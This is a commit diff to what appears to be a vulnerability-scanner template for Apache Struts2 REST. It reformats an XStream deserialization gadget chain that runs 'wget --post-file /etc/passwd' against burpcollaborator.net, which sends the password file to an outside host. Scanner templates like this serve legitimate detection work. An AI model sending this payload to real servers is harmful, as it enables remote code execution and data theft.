Fix Payloads 🛠
parent
837d43a430
commit
dae21b4588
|
@ -11,14 +11,66 @@ requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/struts2-rest-showcase/orders/3"
|
- "{{BaseURL}}/struts2-rest-showcase/orders/3"
|
||||||
- "{{BaseURL}}/orders"
|
- "{{BaseURL}}/orders/3"
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/xml
|
Content-Type: application/xml
|
||||||
body: |
|
body: |
|
||||||
<map>
|
<map>
|
||||||
<entry>
|
<entry>
|
||||||
<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>wget --post-file /etc/passwd burpcollaborator.net</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
<jdk.nashorn.internal.objects.NativeString>
|
||||||
</entry>
|
<flags>0</flags>
|
||||||
|
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
|
||||||
|
<dataHandler>
|
||||||
|
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
|
||||||
|
<is class="javax.crypto.CipherInputStream">
|
||||||
|
<cipher class="javax.crypto.NullCipher">
|
||||||
|
<initialized>false</initialized>
|
||||||
|
<opmode>0</opmode>
|
||||||
|
<serviceIterator class="javax.imageio.spi.FilterIterator">
|
||||||
|
<iter class="javax.imageio.spi.FilterIterator">
|
||||||
|
<iter class="java.util.Collections$EmptyIterator"/>
|
||||||
|
<next class="java.lang.ProcessBuilder">
|
||||||
|
<command>
|
||||||
|
<string>wget</string>
|
||||||
|
<string>--post-file</string>
|
||||||
|
<string>/etc/passwd</string>
|
||||||
|
<string>burpcollaborator.net</string>
|
||||||
|
</command>
|
||||||
|
<redirectErrorStream>false</redirectErrorStream>
|
||||||
|
</next>
|
||||||
|
</iter>
|
||||||
|
<filter class="javax.imageio.ImageIO$ContainsFilter">
|
||||||
|
<method>
|
||||||
|
<class>java.lang.ProcessBuilder</class>
|
||||||
|
<name>start</name>
|
||||||
|
<parameter-types/>
|
||||||
|
</method>
|
||||||
|
<name>asdasd</name>
|
||||||
|
</filter>
|
||||||
|
<next class="string">asdasd</next>
|
||||||
|
</serviceIterator>
|
||||||
|
<lock/>
|
||||||
|
</cipher>
|
||||||
|
<input class="java.lang.ProcessBuilder$NullInputStream"/>
|
||||||
|
<ibuffer></ibuffer>
|
||||||
|
<done>false</done>
|
||||||
|
<ostart>0</ostart>
|
||||||
|
<ofinish>0</ofinish>
|
||||||
|
<closed>false</closed>
|
||||||
|
</is>
|
||||||
|
<consumed>false</consumed>
|
||||||
|
</dataSource>
|
||||||
|
<transferFlavors/>
|
||||||
|
</dataHandler>
|
||||||
|
<dataLen>0</dataLen>
|
||||||
|
</value>
|
||||||
|
</jdk.nashorn.internal.objects.NativeString>
|
||||||
|
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
|
||||||
|
</entry>
|
||||||
|
<entry>
|
||||||
|
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||||
|
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||||
|
</entry>
|
||||||
</map>
|
</map>
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
|
Loading…
Reference in New Issue